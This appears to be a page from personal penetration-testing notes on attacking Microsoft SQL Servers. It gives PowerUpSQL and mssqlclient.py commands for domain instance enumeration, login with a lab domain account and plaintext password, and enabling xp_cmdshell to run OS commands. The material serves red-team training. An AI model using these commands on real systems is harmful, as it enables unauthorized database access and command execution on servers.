search
LinkedInGithub
githubEdit

mssql-server

Tool - PowerUpSQL

Cheat sheet: https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheetarrow-up-right

hashtag
Run enumeration 

Import-module .\PowerUpSQL.ps1
Get-SQLInstanceDomain

hashtag
Authenticate with MSSQL

Windows 

Get-SQLQuery -Verbose -Instance "<SQL_server_ip>,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'Select @@version'

Linux 

mssqlclient.py INLANEFREIGHT/DAMUNDSEN@<sql_server-ip> -windows-auth
Help
enable_xp_cmdshell
xp_cmdshell whoami /priv
Previouskerberos-double-hopNextpowershell-remoting

Last updated